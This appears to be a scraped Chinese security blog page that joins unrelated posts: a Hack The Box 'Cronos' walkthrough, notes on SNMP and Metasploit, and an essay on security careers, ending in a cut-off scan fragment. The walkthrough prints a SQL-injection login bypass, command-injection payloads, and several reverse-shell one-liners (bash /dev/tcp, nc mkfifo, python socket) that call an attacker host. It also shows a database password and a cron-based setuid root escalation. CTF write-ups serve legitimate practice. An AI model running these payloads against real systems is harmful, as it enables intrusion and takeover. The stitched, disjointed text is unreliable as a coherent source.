1
2
3
4
5
6

Discovered open port 22/tcp on 10.10.10.13                                     
Discovered open port 53/udp on 10.10.10.13                                     
Discovered open port 80/tcp on 10.10.10.13                                     
Discovered open port 53/tcp on 10.10.10.13  

53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)

web

1
2
3
4

http://10.10.10.13/

nikto -h 10.10.10.13 > nikto.txt
gobuster -u http://10.10.10.13 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

domain

search domain bin

80web页面除了apache默认配置一无所获，

echo 10.10.10.13 Cronos.htb >> /etc/hosts 以前遇到过这种情况，目标网站只允许通过域名访问。cronos.htb是猜测的域名。

访问http://Cronos.htb，成功列出内容。

• gobuster -u http://Cronos.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
• searchsploit laravel

找不到attack vector

writeup

dns 查询工具

参考资料：如何使用区域传送？

1
2
3

dig @server name type

dig @10.10.10.13 axfr cronos.htb

axfr是dns记录的类型，A记录代表主机记录，域名 <–>IP 映射

NS记录，给出一个域名，查由哪些域名服务器进行解析。诸如此类。

dig查询结果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

; <<>> DiG 9.10.3-P4-Debian <<>> @10.10.10.13 axfr cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A	10.10.10.13
admin.cronos.htb.	604800	IN	A	10.10.10.13
ns1.cronos.htb.		604800	IN	A	10.10.10.13
www.cronos.htb.		604800	IN	A	10.10.10.13
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 298 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Sat Mar 16 11:13:20 +08 2019
;; XFR size: 7 records (messages 1, bytes 203)

echo 10.10.10.13 admin.cronos.htb >> /etc/hosts

访问http://admin.cronos.htb，发现一个登陆表单。

burp抓包，发现是明文

手动尝试一次：Your Login Name or Password is invalid

sqlmap尝试注入：sqlmap -r 1.req -p username –batch

sqlmap -r 1.req -p password –batch

gobuster -u http://admin.cronos.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

wapiti -u http://admin.cronos.htb/

1
2
3
4

echo 10.10.10.13 www.cronos.htb >> /etc/hosts
echo 10.10.10.13 ns1.cronos.htb >> /etc/hosts
ns1.cronos.htb
www.cronos.htb

nothing useful

admin’ or ‘1’=’1 123456

到此为止，思路十分清晰，命令执行漏洞。 ping -c 1 ip

Kioptrix Level 2（命令执行漏洞）

获得一个shell

nc为openbsd版本，无-e选项。

bash无-i选项。

选择用php-reverse-shell.php

command=ping+-c+1&host=8.8.8.8|chmod +x php-reverse-shell.php

修改command=ping+-c+1&host=8.8.8.8后面的命令。

bash -i >& /dev/tcp/10.10.14.7/888 0>&1

wget http://10.10.14.7:8000/php-reverse-shell.php

chmod +x php-reverse-shell.php

./php-reverse-shell.php

python -c ‘import pty; pty.spawn(“/bin/bash”)’

方法二：

kali: nc -lnvp 6677 command=ping+-c+1&host=8.8.8.8|chmod +x php-reverse-shell.php rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 6677| >/tmp/f

burp repeater——选中上述命令——ctl+U进行url编码

虽然反弹了shell，但是会自动退出

方法三

方便快捷

1
2
3

nc -lnvp 6677

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.7",6677));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

提权

内核漏洞提权（failed）

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

uname -a
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

searchsploit linux 4.4.0
1. Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalat 
2. Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation 
3. Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation  
4. Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR 

gcc -h
the program 'gcc' is currently not installed. 

---

cat /etc/passwd | grep home
ps -ef | grep root
root      1083     1  0 Mar15 ?        00:00:00 /usr/sbin/cron -f

mysql

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

/var/www/admin/config.php
admin
kEjdbRigfBHUREiNSDs

mysql -h localhost -u admin -p
输入密码

show databases;
 information_schema 
 admin 

use information_schema;
show tables; 

use admin;
show tables; 
users
select * from users;
|  1 | admin    | 4f5fffa7b2340178a716e3832451e058 

select VERSION();
5.7.17-0ubuntu0.16.04.2 

获得了一串密文，4f5fffa7b2340178a716e3832451e058 不知道明文是不是kEjdbRigfBHUREiNSDs。

如果是，那就不用破解了；如果不是，那就可以尝试su root，用mysql中获取的口令。

md5在线加密kEjdbRigfBHUREiNSDs，经过对比，发现不是。

WTF，竟然要我掏钱。

crontab

crontab定时任务

在linux中，每个用户都有自己的cron job。只要在文本中写入条目，linux就会定时运行该任务。

cron的格式：

crontab -l crontab -e 打开用户的cron job.

root 1102 1 0 10:35 ? 00:00:00 /usr/sbin/cron -f

通过上传LinEnum.sh，运行后发现，可以尝试破解密文。

Kernel.php

find / -name Kernel.php 2>/dev/null

/var/www/laravel/app/Console/Kernel.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

<?php

namespace App\Console;

use Illuminate\Console\Scheduling\Schedule;
use Illuminate\Foundation\Console\Kernel as ConsoleKernel;

class Kernel extends ConsoleKernel
{
    /**
     * The Artisan commands provided by your application.
     *
     * @var array
     */
    protected $commands = [
        //
    ];

    /**
     * Define the application's command schedule.
     *
     * @param  \Illuminate\Console\Scheduling\Schedule  $schedule
     * @return void
     */
    protected function schedule(Schedule $schedule)
    {
	$schedule->exec('chown root:root /tmp/shell;chmod 4777 /tmp/shell')->everyMinute();
    }

    /**
     * Register the Closure based commands for the application.
     *
     * @return void
     */
    protected function commands()
    {
        require base_path('routes/console.php');
    }
}

curl http://10.10.14.7/cat -o shell

将本地的cat二进制文件发送到目标机，保存为/tmp/shell。

稍等片刻，约一分钟左右，该文件为suid权限。 运行该文件，即可以root权限查看/root/root.txt

总结

进一步加深认识了suid权限。

其中，尝试将netcat写入/tmp/shell，尝试将python脚本写入/tmp/shell，都以失败告终。

只有编译的程序才可以使用root权限。

bash script and python script即使有suid权限，运行的命令也不是root权限。

端口扫描

scan

1
2
3
4
5
6
7
8
9
10
11
12

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 15:a4:28:77:ee:13:07:06:34:09:86:fd:6f:cc:4c:e2 (RSA)
|   256 37:be:de:07:0f:10:bb:2b:b5:85:f7:9d:92:5e:83:25 (ECDSA)
|_  256 89:5a:ee:1c:22:02:d2:13:40:f2:45:2e:70:45:b0:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Login

161端口——snmp协议

参考资料：

• http://www.freebuf.com/vuls/133517.html
• http://www.cnblogs.com/LittleHann/p/3834860.html

SNMP = simple network manage protocol = 简单网络管理协议

一个路由器，用SNMP协议报告带宽利用率、冲突率等信息。当snmp协议 配置不当，会泄露系统信息。

？该服务的目的。为了管理网络设备。

案例

开启msfconsole后

use scanner/snmp/snmp_enum

set RHOSTS 192.168.1.0/24（配合zmap寻找目标）

set THREADS 50

run 开始扫描

一连找了7、8个161开放的主机，但是snmp请求总是超时。

…… 可能是哪里出现了问题。

! snmp_enum是用来寻找161开放主机的…… 它效率还不高

在已获得目标的情况下，用snmp_login尝试登陆

在我几乎要放弃的时候，奇迹发生了：》

可以看到它的权限是 read-only只读，如果运气好找到 read-write 那就更好了。

默认账号和密码：public、private

snmp弱口令探测(这里的弱口令是指snmp管理时用到的团体字符串。一般可读权限的为public,可读可写的默认为private)

snmpwalk 使用snmp协议，请求OID对象标识。

snmpwalk -c public -v 1 10.10.10.105

Metasploit的snmp辅助模块

原文

1

   继续我们的信息搜集，让我们看看 SNMP扫描。snmp在寻找具体的系统信息方面 ，或者实际的获取远程设备权限方面很有用。如果你能够发现cisco设备运行着 private字符串，你可以下载整个设备的设置，更改它，并且上传你自己的恶意代码。通常密码是7等级加密，这意味着它们很容易就能解密并获取登陆密码。 Metasploit内置了辅助模块用来扫描snmp设备。这里有许多要点需要知道在我们开始snmp扫描之前。

首先read only 和 read write public字符串对于什么类型的信息能够被获取或者更改很重要。如果你能‘猜’出只读或者读写字符串，你可以获取很多平常方法获取不到的入口。并且，如果基于windows的设备配置了snmp，经常是 只读或者读写团体字符串，你可以获取补丁等级，运行的服务，上一次关机时间，系统的用户名，途径，和许多对于攻击者很有用的方法。

注意：默认的Metasploitable（用来测试meta的linux靶机，译者注） 的smnp设备仅仅监听localhost。这里有许多示范来使你改变这些默认设置。开启并编辑“/etc/defauld/snmpd”

并且改变下面的：

SNMPDOPTS=’-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1’

变为：

SNMPDOPTS=’-Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 0.0.0.0’

设置需要重启生效。一旦重启，你可以在攻击机器上扫描这个设备了。

什么MIB？

当探索snmp时，这里有叫做mib的API。MIB代表management information base，管理信息库。

SNMP协议有3种方式在客户端和远程SNMP设备之间进行身份验证，在SNMP v1和SNMPv2版本中，使用可读的字符串数据类型即社区字符串（公开或私有）来进行认证。

而在SNMP_v3中，用户则可以选择用户名、密码和身份认证方式进行安全验证。另外，像对象标识符（oids）和陷阱消息（traps）等其它内容信息将会统一保存在管理信息库（MIB）中进行存储。译者注_

这个界面允许你探寻设备并且提取信息。Matasploit载入了一些默认的MIBs，在数据库里，meta使用它们来寻找更多的信息取决于获取的入口的等级。让我们来看看辅助模块。

search snmp 使用snmp_login爆破登陆名

use auxiliary/scanner/snmp/snmp_login

set RHOSTS ip范围

set THREADS 10

run

……

[]**192.168.1.50 ‘public’ **‘APC Web/SNMP Management Card (MB:v3.8.6 PF:v3.5.5 PN:apc_hw02_aos_355.bin AF1:v3.5.5 AN1:apc_hw02_sumx_355.bin MN:AP9619 HR:A10 SN: NA0827001465 MD:07/01/2008) (Embedded PowerNet SNMP Agent SW v2.2 compatible)’[]Auxiliary module execution completed

(上面是有用的部分的扫描结果)我们可以找到一个团体字符串‘public’。这最可能是read-only 并且没有揭示很多信息。我们知道了这个设备是APC Web/SNMP设备，和运行的版本。

SNMP Enum

当运行snmp扫描模块，我们可以搜集到许多信息例如开放端口，服务，主机名，进程，和正常运行时间。

使用metasploitable虚拟机作为我们的目标，我们将运行 auxiliary/scanner/snmp/snmp_enum模块，并且看看会提供给我们什么信息。首先我们加载模块并且设置RHOST选项，使用存储在我们的workspace里的信息。

使用 host -R 将会为我们设置这个选项。

info:

1
2
3
4
5
6
7
8
9
10

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 e1:92:1b:48:f8:9b:63:96:d4:e5:7a:40:5f:a4:c8:33 (DSA)
|   2048 af:a0:0f:26:cd:1a:b5:1f:a7:ec:40:94:ef:3c:81:5f (RSA)
|   256 11:a3:2f:25:73:67:af:70:18:56:fe:a2:e3:54:81:e8 (ECDSA)
|_  256 96:81:9c:f4:b7:bc:1a:73:05:ea:ba:41:35:a4:66:b7 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: CompanyDev
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

web

10.10.10.9

上一篇：如何寻找一家靠谱的公司

引子

第二份实习

由于想要毕业以后，做信息安全服务or渗透测试相关的工作，学校课程又比较少，我又去找了一份实习。实习还是有一些收获，虽然不是技术方面，但我不禁想要谈谈工作相关的话题。

公司名字具体叫什么，我就不说了。当初面试的时候，我问A先生（技术负责人），是否有大佬带实习生。公司的人敷衍塞责过去了，说这点东西都还要人带-。-…..顺便diss了我的技术水平。

我以为是因为大佬们工作太忙了，，所以没有多想。

该公司技术部有技术的人可以说是几乎没有，那么作为一家安全公司，他的盈利模式到底是怎样的呢？

该公司只有销售以及技术两大部门（财务/人力资源这里不提），通过销售人员，将安全硬件通过一些渠道卖给小客户；从专科院校招一些刚出学校的人，驻场在甲方公司（国企单位），做一些表面安全性工作，应付zf检查。

所以该公司（2014年注册成立），可以说是并没有什么加入的价值。在这种公司，销售人员>技术人员的模式，上蒙客户下应付员工，销售走了一波再招一波，我不做更多评价。

说来惭愧，因为二十出头，社会经验尚浅……而这种公司的存在，也是让我开了眼界。

正文

信息安全行业从业指南2.0 上一次在网上看到这篇文章后，觉得写的很清楚。看到这本书，赶紧买来看。

看书，当然是带着目的性去看。

以前一直知道有互联网企业、传统企业，甲方、乙方。

大体只知道，互联网企业就是业务基本上放在互联网上的，比如说电子商务之类的。

甲方是业务不以安全为主的公司，各行各业都需要和网络打交道，但主要业务可能是卖车、卖保险等等，像三巨头，bat，B百度-A阿里巴巴-T腾讯，主体业务不是网络安全。

乙方是以安全作为业务，为各种企业提供安全设备、安全服务等等。

企业安全的7大领域：

1. 网络安全（pc/server/network .etc）纯技术方向
2. 平台和业务安全（和甲方公司的具体业务相关）
3. 广义信息安全（包括隐私、数据、纸质文档等信息的安全）
4. IT风险管理、IT审计&内控（合规建设）
5. 业务持续性管理（灾难恢复之类）
6. 安全品牌营销、渠道维护
7. 其他需求

互联网企业和传统企业对于安全性，有什么不同的要求？

互联网企业：信息安全管理、基础构架与网络安全、应用与交付安全（甲方没有足够的能力完成完整的SDL，将这方面外包给乙方安全公司去做）、业务安全。

互联网企业和传统企业在业务上的区别：前者业务主要放在互联网上，而传统企业主要放在线下，所以对于后者来说，安全性工作面临的挑战要更简单一些。

互联网企业对于安全解决方案是以攻防为驱动的，要在服务器上装防病毒软件，不可行的原因：性能损耗、运维成本、软件成本太高。

大型互联网公司，IT建设开始自己发明轮子，完全符合自身业务的解决方案，而不是使用一些标准化的合规、等级保护（太简单且达不到高等级安全要求）之类的东西。

生态级企业&平台级企业的区别

生态级公司安全建设是自己研发; 平台级别采用开源工具

平台级企业的安全团队的知识：web/app、应用层协议、web容器、中间件、数据库

生态级公司：系统底层、二进制、运行时环境和内核级别

大牛即使去小公司也无用武之地。

甲方、乙方做安全，工作内容有何不同？

对于甲方安全团队，安全是一个保值型部门，而不是盈利部门。安全成本和公司盈利能力相关。很好理解，如果说盈利部门负责赚钱，安全部门就是保险箱，负责钱不会变少或者突然不见。

而在乙方，可以对某一方向无限深挖（也属于业务要求），但同时也会杂而不精，和上一句不冲突。因为乙方服务的甲方公司不会是同一种，所以要求也不同。

乙方安全服务的不同方向？

什么是（乙方）合规体系化建设工程师？

ISO27001与等级保护:ISO27001它的目标是帮助企业建设、运行、维护和改进信息安全管理体系。 它的目标是以合适的成本提供满足客户质量要求的IT服务，从流程、人员和技术三方面提升IT的效率和效用。让类似某订票网发生过的员工误操作不再发生，让各类投诉处理得更快，让企业内部安全漏洞修补的效率更高，让混乱不再存在，让救火队卸甲归田，这就是ISO20000的职责所在。

中大规模的甲方企业都有SOX-404类似的合规性需求。

甲方公司可能会遇到什么安全性问题，当遇到问题时，要用什么方式解决，如何防范出现问题。这就是合规的目的。

为什么从事信息安全行业一定要去大公司？

大的公司才有更大更实际重视安全的可能性。“有钱”的公司往往比“没钱”的公司更重视安全，因为安全是一种奢侈品。

参考资料：

在乙方从事网络安全工作的一些思考

https://www.zhihu.com/question/27356955

http://www.360doc.com/content/16/0314/22/31115656_542242914.shtml

10.10.10.69

参考资料：

• github-Micro8
• https://github.com/rapid7/metasploit-framework/wiki/Metasploit-5.0-Release-Notes
• https://www.hackers-arise.com/single-post/2017/06/08/Metasploit-Basics-Part-7-Adding-a-New-Module-EternalBlue

scan

``` Discovered open port 8500/tcp on 10.10.10.11
Discovered open port 135/tcp on 10.10.10.11
Discovered open port 49154/tcp on 10.10.10.11